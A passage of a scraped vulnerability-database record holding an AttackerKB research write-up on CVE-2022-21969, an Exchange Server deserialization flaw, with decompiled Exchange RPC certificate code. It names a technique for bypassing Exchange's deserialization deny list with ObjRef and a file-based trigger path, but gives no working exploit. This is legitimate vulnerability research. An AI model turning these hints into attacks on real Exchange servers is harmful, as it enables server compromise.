"AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2021-11-11T00:00:00", "id": "AKB:EA6AD256-9B4E-4DC6-B230-9ADED3EE40C0", "href": "https://attackerkb.com/topics/4JMe2Y1WSY/cve-2021-42321", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-10-30T05:04:07", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-21846, CVE-2022-21855.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at July 10, 2022 7:02am UTC reported:\n\nThere is a nice writeup on this at <https://medium.com/@frycos/searching-for-deserialization-protection-bypasses-in-microsoft-exchange-cve-2022-21969-bfa38f63a62d>. The bug appears to be a deserialization bug that occurs when loading a specific file, however according to the demo video at <https://gist.github.com/Frycos/a446d86d75c09330d77f37ca28923ddd> it seems to be more of a local attack. That being said it would grant you an LPE to SYSTEM if you were able to trigger it. Furthermore Frycos mentions that he thinks Microsoft didn\u2019t fix the root issue when he wrote the blog (as of January 12th 2022), so its possible the root issue wasn\u2019t fixed, though Frycos mentioned he didn\u2019t look into this further.\n\nFrom <https://twitter.com/MCKSysAr/status/1524518517990727683> it does seem like at the very least some exploitation attempts have been made to try exploit this although writing to `C:\\Program Files\\Microsoft\\Exchange Server\\V15\\UnifiedMessaging\\voicemail` to trigger the bug via making it process a voicemail has proven to be difficult to do. It does however note my tip, shown later in this writeup, of how to bypass the deny list by using `System.Runtime.Remoting.ObjRef` as was pointed out online, was valid.\n\nWhat follows below is some of my notes that I wrote up a while back and never published. Hopefully they are of help to someone.\n\n# Overview\n\n## Background info\n\nDeserialization vulnerability leading to RCE potentially. \nGot a CVSS 3.1 score of 9.0 with a temporal score metric score of 7.8.\n\nInteresting that it mentions the attack vector is Adjacent and the article notes that this may be only cause of the way that he exploited it and may indicate they didn\u2019t fix the root issue.\n\nLow attack complexity and low privileges required seems to indicate it may be authenticated but you don\u2019t need many privileges??? I need to check on this further.\n\nHigh impact on everything else suggest this is a full compromise; this would be in line with leaking the hash.\n\n## Affected\n\n * Microsoft Exchange Server 2019 Cumulative Update 11 prior to January 2022 security update. \n\n * Microsoft Exchange Server 2019 Cumulative Update 10 prior to January 2022 security update. \n\n * Microsoft Exchange Server 2016 Cumulative Update 22 prior to January 2022 security update. \n\n * Microsoft Exchange Server 2016 Cumulative Update 21 prior to January 2022 security update. \n\n * Microsoft Exchange Server 2013 Cumulative Update 23 prior to January 2022 security update. \n\n\n## Fixed By\n\nKB5008631\n\n## Other vulns fixed in same patch\n\nCVE-2022-21846 <\u2013 NSA reported this one. \nCVE-2022-21855 <\u2013 Reported by Andrew Ruddick of MSRC.\n\n# Writeup Review\n\nOriginal writeup: <https://www.instapaper.com/read/1487196325>\n\nWe have well known _sinks_ in [[.NET]] whereby one can make deserialization calls from unprotected formatters such as `BinaryFormatter`. These formatters as noted in [[CVE-2021-42321]] don\u2019t have any `SerializationBinder` or similar binders attached to them, which means that they are open to deserialize whatever they like, without any binder limiting them to what they can deserialize.\n\nInitial search for vulnerabilities took place around Exchange\u2019s `Rpc` functions, which use a binary protocol created by Microsoft for communication instead of using normal HTTP requests.\n\nLooking around we can see `Microsoft.Exchange.Rpc.ExchangeCertificates.ExchangeCertificateRpcServer` contains several function prototypes:\n \n \n // Microsoft.Exchange.Rpc.ExchangeCertificate.ExchangeCertificateRpcServer \n using System; \n using System.Security; \n using Microsoft.Exchange.Rpc; \n \n internal abstract class ExchangeCertificateRpcServer : RpcServerBase \n { \n \u00a0\u00a0\u00a0\u00a0public unsafe static IntPtr RpcIntfHandle = (IntPtr)<Module>.IExchangeCertificate_v1_0_s_ifspec; \n \n \u00a0\u00a0\u00a0\u00a0public abstract byte[] GetCertificate(int version, byte[] pInBytes); \n \n \u00a0\u00a0\u00a0\u00a0public abstract byte[] CreateCertificate(int version, byte[] pInBytes); \n \n \u00a0\u00a0\u00a0\u00a0public abstract byte[] RemoveCertificate(int version, byte[] pInBytes); \n \n \u00a0\u00a0\u00a0\u00a0public abstract byte[] ExportCertificate(int version, byte[] pInBytes, SecureString password); \n \n \u00a0\u00a0\u00a0\u00a0public abstract byte[] ImportCertificate(int version, byte[] pInBytes, SecureString password); \n \n \u00a0\u00a0\u00a0\u00a0public abstract byte[] EnableCertificate(int version, byte[] pInBytes); \n \n \u00a0\u00a0\u00a0\u00a0public ExchangeCertificateRpcServer() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nThese are then implemented in `Microsoft.Exchange.Servicelets.ExchangeCertificate.ExchangeCertificateServer`.\n \n \n // Microsoft.Exchange.Servicelets.ExchangeCertificate.ExchangeCertificateServer \n using System; \n using System.Security; \n using System.Security.AccessControl; \n using System.Security.Principal; \n using Microsoft.Exchange.Management.SystemConfigurationTasks; \n using Microsoft.Exchange.Rpc; \n using Microsoft.Exchange.Rpc.ExchangeCertificate; \n using Microsoft.Exchange.Servicelets.ExchangeCertificate; \n \n internal class ExchangeCertificateServer : ExchangeCertificateRpcServer \n { \n \u00a0\u00a0\u00a0\u00a0internal const string RequestStoreName = \"REQUEST\"; \n \n \u00a0\u00a0\u00a0\u00a0private static ExchangeCertificateServer server; \n \n \u00a0\u00a0\u00a0\u00a0public static bool Start(out Exception e) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0e = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.BuiltinAdministratorsSid, null); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0FileSystemAccessRule accessRule = new FileSystemAccessRule(securityIdentifier, FileSystemRights.Read, AccessControlType.Allow); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0FileSecurity fileSecurity = new FileSecurity(); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0fileSecurity.SetOwner(securityIdentifier); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0fileSecurity.SetAccessRule(accessRule); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0server = (ExchangeCertificateServer)RpcServerBase.RegisterServer(typeof(ExchangeCertificateServer), fileSecurity, 1u, isLocalOnly: false); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return true; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (RpcException ex) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0RpcException ex2 = (RpcException)(e = ex); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return false; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public static void Stop() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (server != null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0RpcServerBase.StopServer(ExchangeCertificateRpcServer.RpcIntfHandle); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0server = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override byte[] CreateCertificate(int version, byte[] inputBlob) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateServerHelper.CreateCertificate(ExchangeCertificateRpcVersion.Version1, inputBlob); \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override byte[] GetCertificate(int version, byte[] inputBlob) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateServerHelper.GetCertificate(ExchangeCertificateRpcVersion.Version1, inputBlob); \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override byte[] RemoveCertificate(int version, byte[] inputBlob) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateServerHelper.RemoveCertificate(ExchangeCertificateRpcVersion.Version1, inputBlob); \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override byte[] ExportCertificate(int version, byte[] inputBlob, SecureString password) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateServerHelper.ExportCertificate(ExchangeCertificateRpcVersion.Version1, inputBlob, password); \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override byte[] ImportCertificate(int version, byte[] inputBlob, SecureString password) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateServerHelper.ImportCertificate(ExchangeCertificateRpcVersion.Version1, inputBlob, password); \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override byte[] EnableCertificate(int version, byte[] inputBlob) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateServerHelper.EnableCertificate(ExchangeCertificateRpcVersion.Version1, inputBlob); \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nExamining these functions we can see a lot of them take a byte array input named `byte[] inputBlob`. If we follow the `ImportCertificate()` function here as an example we can see that the implementation will call into `Microsoft.Exchange.Servicelets.ExchangeCertificate.ExchangeCertificateServerHelper`, as is also true for the other functions.\n \n \n // Microsoft.Exchange.Servicelets.ExchangeCertificate.ExchangeCertificateServerHelper \n using System; \n using System.Collections.Generic; \n using System.Management.Automation; \n using System.Security; \n using System.Security.Cryptography; \n using System.Security.Cryptography.X509Certificates; \n using System.Text; \n using Microsoft.Exchange.Data; \n using Microsoft.Exchange.Data.Common; \n using Microsoft.Exchange.Data.Directory; \n using Microsoft.Exchange.Data.Directory.Management; \n using Microsoft.Exchange.Data.Directory.SystemConfiguration; \n using Microsoft.Exchange.Extensions; \n using Microsoft.Exchange.Management.FederationProvisioning; \n using Microsoft.Exchange.Management.Metabase; \n using Microsoft.Exchange.Management.SystemConfigurationTasks; \n using Microsoft.Exchange.Management.Tasks; \n using Microsoft.Exchange.Net; \n using Microsoft.Exchange.Security.Cryptography.X509Certificates; \n using Microsoft.Exchange.Servicelets.ExchangeCertificate; \n \n internal class ExchangeCertificateServerHelper \n { \n \n ... \n \n \u00a0\u00a0\u00a0\u00a0public static byte[] ImportCertificate(ExchangeCertificateRpcVersion rpcVersion, byte[] inputBlob, SecureString password) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bool flag = false; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ExchangeCertificateRpc exchangeCertificateRpc = new ExchangeCertificateRpc(rpcVersion, inputBlob, null); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (string.IsNullOrEmpty(exchangeCertificateRpc.ImportCert)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateRpc.SerializeError(rpcVersion, Strings.ImportCertificateDataInvalid, ErrorCategory.ReadError); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Server server = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ITopologyConfigurationSession topologyConfigurationSession = DirectorySessionFactory.Default.CreateTopologyConfigurationSession(ConsistencyMode.IgnoreInvalid, ADSessionSettings.FromRootOrgScopeSet(), 1159, \"ImportCertificate\", \"d:\\\\dbs\\\\sh\\\\e19dt\\\\1103_100001\\\\cmd\\\\c\\\\sources\\\\Dev\\\\Management\\\\src\\\\ServiceHost\\\\Servicelets\\\\ExchangeCertificate\\\\Program\\\\ExchangeCertificateServer.cs\"); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0server = ManageExchangeCertificate.FindLocalServer(topologyConfigurationSession); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (LocalServerNotFoundException) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0flag = true; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (flag || !ManageExchangeCertificate.IsServerRoleSupported(server)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateRpc.SerializeError(rpcVersion, Strings.RoleDoesNotSupportExchangeCertificateTasksException, ErrorCategory.InvalidOperation); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0X509Store x509Store = new X509Store(StoreName.My, StoreLocation.LocalMachine); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509Store.Open(OpenFlags.ReadWrite | OpenFlags.OpenExistingOnly); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (CryptographicException) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509Store = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0List<ServiceData> installed = new List<ServiceData>(); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0GetInstalledRoles(topologyConfigurationSession, server, installed); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0byte[] array = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (CertificateEnroller.TryAcceptPkcs7(exchangeCertificateRpc.ImportCert, out var thumbprint, out var untrustedRoot)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0X509Certificate2Collection x509Certificate2Collection = x509Store.Certificates.Find(X509FindType.FindByThumbprint, thumbprint, validOnly: false); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (x509Certificate2Collection.Count > 0) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (!string.IsNullOrEmpty(exchangeCertificateRpc.ImportDescription)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509Certificate2Collection[0].FriendlyName = exchangeCertificateRpc.ImportDescription; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ExchangeCertificate exchangeCertificate = new ExchangeCertificate(x509Certificate2Collection[0]); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0UpdateServices(exchangeCertificate, server, installed); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0exchangeCertificateRpc.ReturnCert = exchangeCertificate; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return exchangeCertificateRpc.SerializeOutputParameters(rpcVersion); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (untrustedRoot) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateRpc.SerializeError(rpcVersion, Strings.ImportCertificateUntrustedRoot, ErrorCategory.ReadError); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0array = Convert.FromBase64String(exchangeCertificateRpc.ImportCert); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (FormatException) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateRpc.SerializeError(rpcVersion, Strings.ImportCertificateBase64DataInvalid, ErrorCategory.ReadError); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0X509Certificate2 x509Certificate = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0X509KeyStorageFlags x509KeyStorageFlags = X509KeyStorageFlags.MachineKeySet | X509KeyStorageFlags.PersistKeySet; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bool flag2 = password == null || password.Length == 0; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0X509Certificate2Collection x509Certificate2Collection2 = new X509Certificate2Collection(); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (exchangeCertificateRpc.ImportExportable) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509KeyStorageFlags |= X509KeyStorageFlags.Exportable; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509Certificate2Collection2.Import(array, flag2 ? null : password.AsUnsecureString(), x509KeyStorageFlags); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509Certificate = ManageExchangeCertificate.FindImportedCertificate(x509Certificate2Collection2); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (CryptographicException) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateRpc.SerializeError(rpcVersion, Strings.ImportCertificateDataInvalid, ErrorCategory.ReadError); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (x509Certificate == null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateRpc.SerializeError(rpcVersion, Strings.ImportCertificateDataInvalid, ErrorCategory.ReadError); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (!string.IsNullOrEmpty(exchangeCertificateRpc.ImportDescription)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509Certificate.FriendlyName = exchangeCertificateRpc.ImportDescription; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (x509Store.Certificates.Find(X509FindType.FindByThumbprint, x509Certificate.Thumbprint, validOnly: false).Count > 0) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeCertificateRpc.SerializeError(rpcVersion, Strings.ImportCertificateAlreadyExists(x509Certificate.Thumbprint), ErrorCategory.WriteError); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509Store.Add(x509Certificate); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ExchangeCertificate exchangeCertificate2 = new ExchangeCertificate(x509Certificate); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0UpdateServices(exchangeCertificate2, server, installed); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0exchangeCertificateRpc.ReturnCert = exchangeCertificate2; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0finally \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0x509Store?.Close(); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return exchangeCertificateRpc.SerializeOutputParameters(rpcVersion); \n \u00a0\u00a0\u00a0\u00a0} \n \n ...\n \n\nWe can see from this that most functions appear to be calling `Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc.ExchangeCertificateRpc()`. This has some interesting code relevant to deserialization:\n \n \n // Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc \n using System.Collections.Generic; \n using Microsoft.Exchange.Rpc.ExchangeCertificate; \n \n public ExchangeCertificateRpc(ExchangeCertificateRpcVersion version, byte[] inputBlob, byte[] outputBlob) \n { \n \u00a0\u00a0\u00a0\u00a0inputParameters = new Dictionary<RpcParameters, object>(); \n \u00a0\u00a0\u00a0\u00a0if (inputBlob != null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0switch (version) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0case ExchangeCertificateRpcVersion.Version1: \n 